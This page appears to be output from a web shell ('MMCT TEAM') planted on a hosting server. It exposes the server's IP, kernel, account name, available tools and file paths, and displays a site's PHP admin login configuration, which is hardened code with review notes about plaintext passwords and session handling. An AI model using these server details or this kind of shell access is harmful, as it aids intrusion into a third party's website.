MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 52.14.88.137
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/ppcad7no/bhatiataxiservice.in/admin/


Current File : /home2/ppcad7no/bhatiataxiservice.in/admin/config.php
<?php 
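    // Start the session with a hardened cookie: not readable from JavaScript,
    // not attached to cross-site subrequests, and session IDs that the server
    // did not issue are refused.
    session_start([
        'cookie_httponly' => true,
        'cookie_samesite' => 'Lax',
        'use_strict_mode' => true,
    ]);

    // Database credentials are read from the process environment instead of
    // being written into this file. A literal password in a PHP source file is
    // disclosed to anyone who can read the file (backup copies, source
    // disclosure, another account on the host). The variable names are this
    // file's own convention; define them in the web-server or PHP-FPM
    // configuration. A password that has ever been stored here must be
    // rotated, not only moved.
    $dbHost = getenv('DB_HOST') ?: 'localhost';
    $dbUser = getenv('DB_USER');
    $dbPass = getenv('DB_PASSWORD');
    $dbName = getenv('DB_NAME');

    if ($dbUser === false || $dbPass === false || $dbName === false) {
        // Fail closed, and keep the detail in the server log only.
        error_log('config.php: database credentials are not configured');
        http_response_code(500);
        exit('Service unavailable');
    }

    // connect to database
    try {
        $db = mysqli_connect($dbHost, $dbUser, $dbPass, $dbName);
    } catch (mysqli_sql_exception $connectError) {
        // mysqli throws on failure when exception reporting is enabled.
        error_log('config.php: database connection failed: ' . $connectError->getMessage());
        $db = false;
    }
    unset($dbPass);

    if (!$db) {
        // Every function below assumes a live connection, so stop here rather
        // than letting later queries fail with errors shown to the visitor.
        http_response_code(500);
        exit('Service unavailable');
    }

    // variable declaration
    $username = "";
    $email    = "";
    $errors   = array();

    // A submitted login form is handled as soon as this file is included.
    if (isset($_POST['login_btn'])) {
        login();
    }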
    
    // LOGIN USER
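    /**
     * Handle a submitted login form.
     *
     * Reads `username` and `password` from $_POST, looks the pair up first in
     * login_tbl (active accounts only) and then in tbl_member, and on a match
     * stores the row in $_SESSION['user'] and redirects. On failure it sets
     * $_SESSION['msg'], redirects to login.php and appends to the global
     * $errors list.
     *
     * Changes from the earlier version:
     *  - values are bound as statement parameters instead of being escaped and
     *    pasted into the SQL text;
     *  - a successful login in login_tbl returns immediately. Before, execution
     *    fell through to the tbl_member lookup, which could replace the session
     *    user and the redirect, and the "Wrong username/password" error was
     *    appended even after a successful login;
     *  - the session ID is regenerated on login so an ID planted before
     *    authentication is not carried into the authenticated session.
     *
     * NOTE(review): both queries compare the submitted password with the stored
     * column directly, so the tables appear to hold plaintext passwords. That
     * needs a migration to password_hash()/password_verify(); it cannot be
     * fixed inside this function alone.
     * NOTE(review): the whole row, password column included, is kept in
     * $_SESSION['user'] as before; consider dropping the password once callers
     * are confirmed not to read it.
     */
    function login(){
        global $db, $username, $errors;

        // Take raw, trimmed form values. Anything that is not a string (for
        // example an array sent as username[]=x) is treated as missing.
        $username = is_string($_POST['username'] ?? null) ? trim($_POST['username']) : '';
        $password = is_string($_POST['password'] ?? null) ? trim($_POST['password']) : '';

        // make sure form is filled properly
        if ($username === '') {
            array_push($errors, "Username is required");
        }
        if ($password === '') {
            array_push($errors, "Password is required");
        }
        if (count($errors) > 0) {
            return;
        }

        // Staff accounts first: only rows marked Active are considered.
        $staff = login_find_account(
            $db,
            "SELECT * FROM login_tbl WHERE username = ? AND password = ? AND admin_status = 'Active' LIMIT 1",
            $username,
            $password
        );

        $staffTypes = array('supadmin', 'admin', 'user');
        if ($staff !== null && in_array($staff['user_type'] ?? null, $staffTypes, true)) {
            session_regenerate_id(true);
            $_SESSION['user'] = $staff;
            $_SESSION['success']  = "";
            header('location: index.php');
            return;
        }

        // No usable staff account: try the member table.
        $member = login_find_account(
            $db,
            "SELECT * FROM tbl_member WHERE username = ? AND password = ? LIMIT 1",
            $username,
            $password
        );

        if ($member !== null) {
            session_regenerate_id(true);
            $_SESSION['user'] = $member;
            $_SESSION['success']  = "";
            header('location:member_home.php');
            return;
        }

        // No user found in either table. A staff row with an unknown user_type
        // keeps its own message, as before.
        $_SESSION['msg'] = ($staff !== null) ? "Invalid user type" : "Invalid username or password";
        header('location: login.php');
        array_push($errors, "Wrong username/password ");
    }

    /**
     * Run one credential lookup with bound parameters.
     *
     * $sql must be fixed text with exactly two `?` placeholders (username,
     * password). Returns the matching row as an associative array, or null
     * when nothing matches or the statement cannot be prepared or read.
     */
    function login_find_account($db, $sql, $username, $password){
        $stmt = mysqli_prepare($db, $sql);
        if ($stmt === false) {
            // Keep the database detail out of the response.
            error_log('login: could not prepare account lookup');
            return null;
        }

        mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
        mysqli_stmt_execute($stmt);

        $result = mysqli_stmt_get_result($stmt);
        $row = ($result === false) ? null : mysqli_fetch_assoc($result);
        mysqli_stmt_close($stmt);

        return is_array($row) ? $row : null;
    }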
    
    
    
    
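    /**
     * Report whether the session belongs to an account whose user_type is
     * exactly 'admin'.
     *
     * The session row may come from a table without a user_type column (the
     * member login stores a tbl_member row), so a missing key is treated as
     * "not admin" instead of raising an undefined-index warning.
     *
     * NOTE(review): 'supadmin' does not count as admin here; confirm that is
     * intended before using this as the only guard on an admin page.
     */
    function isAdmin()
    {
        return ($_SESSION['user']['user_type'] ?? null) === 'admin';
    }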
    
    // return user array from their id
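    /**
     * Fetch one login_tbl row by its id.
     *
     * The id used to be pasted into the SQL text without quotes, so any
     * caller-supplied value became part of the statement. It is now checked to
     * be an integer and bound as a parameter.
     * (Assumes login_tbl.id is an integer key; the unquoted form only worked
     * for numeric values. Confirm against the schema.)
     *
     * Returns the row as an associative array, or null when the id is not an
     * integer, no row matches, or the lookup fails.
     */
    function getUserById($id){
        $userId = filter_var($id, FILTER_VALIDATE_INT);
        if ($userId === false) {
            // Reject before touching the database.
            return null;
        }

        global $db;
        $stmt = mysqli_prepare($db, "SELECT * FROM login_tbl WHERE id = ?");
        if ($stmt === false) {
            error_log('getUserById: could not prepare lookup');
            return null;
        }

        mysqli_stmt_bind_param($stmt, 'i', $userId);
        mysqli_stmt_execute($stmt);

        $result = mysqli_stmt_get_result($stmt);
        $user = ($result === false) ? null : mysqli_fetch_assoc($result);
        mysqli_stmt_close($stmt);

        return is_array($user) ? $user : null;
    }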
    
    // escape string
    /**
     * Trim a value and escape it with mysqli_real_escape_string() on the
     * shared connection.
     *
     * The result is only safe inside a quoted SQL string literal. It does not
     * protect a value placed in an unquoted position such as a numeric
     * comparison, and it is not HTML escaping. The escaping also depends on
     * the connection character set. Bound parameters are the preferred way
     * to pass values.
     */
    function e($val){
        global $db;

        $trimmed = trim($val);

        return mysqli_real_escape_string($db, $trimmed);
    }
    
    /**
     * Print every message in the global $errors list inside one
     * <div class="error">, each followed by <br>. Prints nothing when the list
     * is empty.
     *
     * Messages are written out as-is, without HTML escaping, so anything
     * pushed onto $errors must already be safe markup. Never push raw request
     * data onto the list.
     */
    function display_error() {
        global $errors;

        if (count($errors) === 0) {
            return;
        }

        $markup = '<div class="error">';
        foreach ($errors as $message) {
            $markup .= $message . '<br>';
        }
        $markup .= '</div>';

        echo $markup;
    }
    
    /**
     * Report whether the session holds a user entry.
     *
     * This only checks that $_SESSION['user'] is set and not null; it says
     * nothing about which kind of account it is.
     */
    function isLoggedIn()
    {
        return isset($_SESSION['user']);
    }
    
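    // Log out: clear the session data, destroy the session, redirect to the
    // login page and stop. Without the exit, the page that included this file
    // would keep executing and could still send its body along with the
    // redirect header.
    // NOTE(review): logout is triggered by a plain GET parameter, so any link
    // or image pointing at ?logout can end a user's session; consider a POST
    // with a CSRF token.
    if (isset($_GET['logout'])) {
        $_SESSION = array();
        session_destroy();
        header("location: login.php");
        exit;
    }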
    
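    /**
     * Prepare a statement on the shared connection and return it.
     *
     * $sql must be fixed text with `?` placeholders; values are bound by the
     * caller and never concatenated into $sql.
     *
     * If preparation fails the request is terminated. The database error text
     * is written to the server log only, because it can reveal table and
     * column names when shown to a visitor. When mysqli reports errors as
     * exceptions, mysqli_prepare() throws instead of returning false and this
     * branch is not reached.
     */
    function my_prepared($sql) {
        global $db;

        $stmt = mysqli_prepare($db, $sql);
        if (!$stmt) {
            error_log("Prepared statement error: " . mysqli_error($db));
            http_response_code(500);
            die("Prepared statement error");
        }

        return $stmt;
    }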
?>

MMCT - 2023